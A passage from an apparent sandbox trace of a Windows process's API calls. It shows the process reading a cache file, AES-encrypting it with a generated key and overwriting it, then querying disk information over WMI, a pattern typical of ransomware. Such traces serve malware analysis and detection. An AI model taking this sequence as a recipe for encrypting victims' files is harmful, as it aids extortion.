hTemplateFile=0x0) returned 0x508 [0145.111] GetFileType (hFile=0x508) returned 0x1 [0145.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb28) returned 1 [0145.111] GetFileType (hFile=0x508) returned 0x1 [0145.111] WriteFile (in: hFile=0x508, lpBuffer=0x36a5cb4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ebf0, lpOverlapped=0x0 | out: lpBuffer=0x36a5cb4*, lpNumberOfBytesWritten=0x949ebf0*=0x1000, lpOverlapped=0x0) returned 1 [0145.112] WriteFile (in: hFile=0x508, lpBuffer=0x36a5cb4*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ebc4, lpOverlapped=0x0 | out: lpBuffer=0x36a5cb4*, lpNumberOfBytesWritten=0x949ebc4*=0x55e, lpOverlapped=0x0) returned 1 [0145.112] CloseHandle (hObject=0x508) returned 1 [0145.112] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x949e798, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0145.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec44) returned 1 [0145.112] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x36a6cd0 | out: lpFileInformation=0x36a6cd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918)) returned 1 [0145.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec40) returned 1 [0145.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x949e684, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0145.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb78) returned 1 [0145.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x508 [0145.113] GetFileType (hFile=0x508) returned 0x1 [0145.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb74) returned 1 [0145.113] GetFileType (hFile=0x508) returned 0x1 [0145.113] GetFileSize (in: hFile=0x508, lpFileSizeHigh=0x949ec80 | out: lpFileSizeHigh=0x949ec80*=0x0) returned 0x1a918 [0145.113] ReadFile (in: hFile=0x508, lpBuffer=0x457de40, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x949ec2c, lpOverlapped=0x0 | out: lpBuffer=0x457de40*, lpNumberOfBytesRead=0x949ec2c*=0x1a918, lpOverlapped=0x0) returned 1 [0145.115] CloseHandle (hObject=0x508) returned 1 [0145.115] CryptAcquireContextW (in: phProv=0x949ebcc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ebcc*=0xb1dc90) returned 1 [0145.116] CryptGenRandom (in: hProv=0xb1dc90, dwLen=0x10, pbBuffer=0x36a7598 | out: pbBuffer=0x36a7598) returned 1 [0147.450] CryptImportKey (in: hProv=0xb1dc90, pbData=0x38b5d50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949eb9c | out: phKey=0x949eb9c*=0xb7f950) returned 1 [0147.450] CryptContextAddRef (hProv=0xb1dc90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.450] CryptContextAddRef (hProv=0xb1dc90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.450] CryptDuplicateKey (in: hKey=0xb7f950, pdwReserved=0x0, dwFlags=0x0, phKey=0x949eb8c | out: phKey=0x949eb8c*=0xb7f990) returned 1 [0147.450] CryptContextAddRef (hProv=0xb1dc90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.450] CryptSetKeyParam (hKey=0xb7f990, dwParam=0x4, pbData=0x38b5e30*=0x1, dwFlags=0x0) returned 1 [0147.450] CryptSetKeyParam (hKey=0xb7f990, dwParam=0x1, pbData=0x38b5dfc, dwFlags=0x0) returned 1 [0147.450] CryptEncrypt (in: hKey=0xb7f990, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x473dea8*, pdwDataLen=0x949ebf8*=0x1a920, dwBufLen=0x1a920 | out: pbData=0x473dea8*, pdwDataLen=0x949ebf8*=0x1a920) returned 1 [0147.451] CryptEncrypt (in: hKey=0xb7f990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38b5e58*, pdwDataLen=0x949ec00*=0x0, dwBufLen=0x10 | out: pbData=0x38b5e58*, pdwDataLen=0x949ec00*=0x10) returned 1 [0147.452] CryptDestroyKey (hKey=0xb7f950) returned 1 [0147.452] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0147.452] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0147.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x949e670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0147.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb64) returned 1 [0147.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4b4 [0147.465] GetFileType (hFile=0x4b4) returned 0x1 [0147.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb60) returned 1 [0147.465] GetFileType (hFile=0x4b4) returned 0x1 [0147.465] WriteFile (in: hFile=0x4b4, lpBuffer=0x38b647c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ebf4, lpOverlapped=0x0 | out: lpBuffer=0x38b647c*, lpNumberOfBytesWritten=0x949ebf4*=0x20, lpOverlapped=0x0) returned 1 [0147.466] CloseHandle (hObject=0x4b4) returned 1 [0147.467] CoTaskMemAlloc (cb=0x20c) returned 0xbe2fe0 [0147.467] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2fe0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0147.467] CoTaskMemFree (pv=0xbe2fe0) [0147.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e658, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0147.467] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949eba0 | out: ppv=0x949eba0*=0xb51e34) returned 0x0 [0147.467] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949eb98 | out: pAptType=0x949eb98*=1) returned 0x0 [0147.467] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949eb9c | out: ppvObject=0x949eb9c*=0x0) returned 0x80004002 [0147.467] IUnknown:Release (This=0xb51e34) returned 0x1 [0147.468] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e508 | out: ppv=0x949e508*=0x6024880) returned 0x0 [0147.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024880, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e720 | out: ppvObject=0x949e720*=0x0) returned 0x80004002 [0147.469] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024880, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e734 | out: ppvObject=0x949e734*=0x60256f0) returned 0x0 [0147.469] WbemDefPath:IUnknown:Release (This=0x6024880) returned 0x0 [0147.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0x60256f0) returned 0x0 [0147.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0147.469] WbemDefPath:IUnknown:AddRef (This=0x60256f0) returned 0x3 [0147.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0147.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0147.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xbe2550) returned 0x0 [0147.469] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2550, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0147.469] WbemDefPath:IUnknown:Release (This=0xbe2550) returned 0x3 [0147.469] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0147.470] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0147.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0x0) returned 0x80004002 [0147.470] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x2 [0147.470] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x1 [0147.470] CoGetContextToken (in: pToken=0x949ea18 | out: pToken=0x949ea18) returned 0x0 [0147.470] CoGetContextToken (in: pToken=0x949e978 | out: pToken=0x949e978) returned 0x0 [0147.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x60256f0, riid=0x949ea48*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949ea44 | out: ppvObject=0x949ea44*=0x60256f0) returned 0x0 [0147.470] WbemDefPath:IUnknown:AddRef (This=0x60256f0) returned 0x3 [0147.470] WbemDefPath:IUnknown:Release (This=0x60256f0) returned 0x2 [0147.470] WbemDefPath:IWbemPath:SetText (This=0x60256f0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60256f0, puCount=0x949ebcc | out: puCount=0x949ebcc*=0x0) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetText (in: This=0x60256f0, lFlags=2, puBuffLength=0x949ebc8*=0x0, pszText=0x0 | out: puBuffLength=0x949ebc8*=0x20, pszText=0x0) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetText (in: This=0x60256f0, lFlags=2, puBuffLength=0x949ebc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ebc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x60256f0, uRequestedInfo=0x0, puResponse=0x949ebd4 | out: puResponse=0x949ebd4*=0xc19) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60256f0, puCount=0x949ebcc | out: puCount=0x949ebcc*=0x0) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x60256f0, uRequestedInfo=0x0, puResponse=0x949ebd4 | out: puResponse=0x949ebd4*=0xc19) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x60256f0, uRequestedInfo=0x0, puResponse=0x949ebd4 | out: puResponse=0x949ebd4*=0xc19) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60256f0, puCount=0x949eb4c | out: puCount=0x949eb4c*=0x0) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949eb38 | out: puCount=0x949eb38*=0x2) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949eb34*=0x0, pszText=0x0 | out: puBuffLength=0x949eb34*=0xf, pszText=0x0) returned 0x0 [0147.470] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949eb34*=0xf, pszText="00000000000000" | out: puBuffLength=0x949eb34*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0147.470] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949eae8 | out: ppv=0x949eae8*=0xb51e34) returned 0x0 [0147.471] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949eae0 | out: pAptType=0x949eae0*=1) returned 0x0 [0147.471] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949eae4 | out: ppvObject=0x949eae4*=0x0) returned 0x80004002 [0147.471] IUnknown:Release (This=0xb51e34) returned 0x1 [0147.471] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e450 | out: ppv=0x949e450*=0x6024940) returned 0x0 [0147.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024940, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e668 | out: ppvObject=0x949e668*=0x0) returned 0x80004002 [0147.471] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024940, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e67c | out: ppvObject=0x949e67c*=0x6025680) returned 0x0 [0147.471] WbemDefPath:IUnknown:Release (This=0x6024940) returned 0x0 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e29c | out: ppvObject=0x949e29c*=0x6025680) returned 0x0 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e258 | out: ppvObject=0x949e258*=0x0) returned 0x80004002 [0147.472] WbemDefPath:IUnknown:AddRef (This=0x6025680) returned 0x3 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbb4 | out: ppvObject=0x949dbb4*=0x0) returned 0x80004002 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db64 | out: ppvObject=0x949db64*=0x0) returned 0x80004002 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db70 | out: ppvObject=0x949db70*=0xbdee60) returned 0x0 [0147.472] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdee60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db78 | out: pCid=0x949db78*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0147.472] WbemDefPath:IUnknown:Release (This=0xbdee60) returned 0x3 [0147.472] CoGetContextToken (in: pToken=0x949dbd0 | out: pToken=0x949dbd0) returned 0x0 [0147.472] CoGetContextToken (in: pToken=0x949dfd8 | out: pToken=0x949dfd8) returned 0x0 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e068 | out: ppvObject=0x949e068*=0x0) returned 0x80004002 [0147.472] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x2 [0147.472] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x1 [0147.472] CoGetContextToken (in: pToken=0x949e960 | out: pToken=0x949e960) returned 0x0 [0147.472] CoGetContextToken (in: pToken=0x949e8c0 | out: pToken=0x949e8c0) returned 0x0 [0147.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x949e990*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e98c | out: ppvObject=0x949e98c*=0x6025680) returned 0x0 [0147.472] WbemDefPath:IUnknown:AddRef (This=0x6025680) returned 0x3 [0147.472] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x2 [0147.472] WbemDefPath:IWbemPath:SetText (This=0x6025680, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0147.472] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025680, puCount=0x949eb10 | out: puCount=0x949eb10*=0x2) returned 0x0 [0147.472] WbemDefPath:IWbemPath:GetText (in: This=0x6025680, lFlags=4, puBuffLength=0x949eb0c*=0x0, pszText=0x0 | out: puBuffLength=0x949eb0c*=0xf, pszText=0x0) returned 0x0 [0147.472] WbemDefPath:IWbemPath:GetText (in: This=0x6025680, lFlags=4, puBuffLength=0x949eb0c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949eb0c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0147.472] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949eb10 | out: ppv=0x949eb10*=0xb51e34) returned 0x0 [0147.472] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949eb08 | out: pAptType=0x949eb08*=1) returned 0x0 [0147.473] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949eb0c | out: ppvObject=0x949eb0c*=0x0) returned 0x80004002 [0147.473] IUnknown:Release (This=0xb51e34) returned 0x1 [0147.473] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e730 | out: ppv=0x949e730*=0x602b498) returned 0x0 [0147.473] WbemLocator:IUnknown:QueryInterface (in: This=0x602b498, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e948 | out: ppvObject=0x949e948*=0x0) returned 0x80004002 [0147.473] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b498, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e95c | out: ppvObject=0x949e95c*=0x60248d0) returned 0x0 [0147.473] WbemLocator:IUnknown:Release (This=0x602b498) returned 0x0 [0147.473] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e57c | out: ppvObject=0x949e57c*=0x60248d0) returned 0x0 [0147.473] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e538 | out: ppvObject=0x949e538*=0x0) returned 0x80004002 [0147.474] WbemLocator:IUnknown:AddRef (This=0x60248d0) returned 0x3 [0147.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949de94 | out: ppvObject=0x949de94*=0x0) returned 0x80004002 [0147.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949de44 | out: ppvObject=0x949de44*=0x0) returned 0x80004002 [0147.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0147.474] CoGetContextToken (in: pToken=0x949deb0 | out: pToken=0x949deb0) returned 0x0 [0147.474] CoGetContextToken (in: pToken=0x949e2b8 | out: pToken=0x949e2b8) returned 0x0 [0147.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e348 | out: ppvObject=0x949e348*=0x0) returned 0x80004002 [0147.474] WbemLocator:IUnknown:Release (This=0x60248d0) returned 0x2 [0147.474] WbemLocator:IUnknown:Release (This=0x60248d0) returned 0x1 [0147.474] CoGetContextToken (in: pToken=0x949e928 | out: pToken=0x949e928) returned 0x0 [0147.474] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0147.474] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x949e958*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), 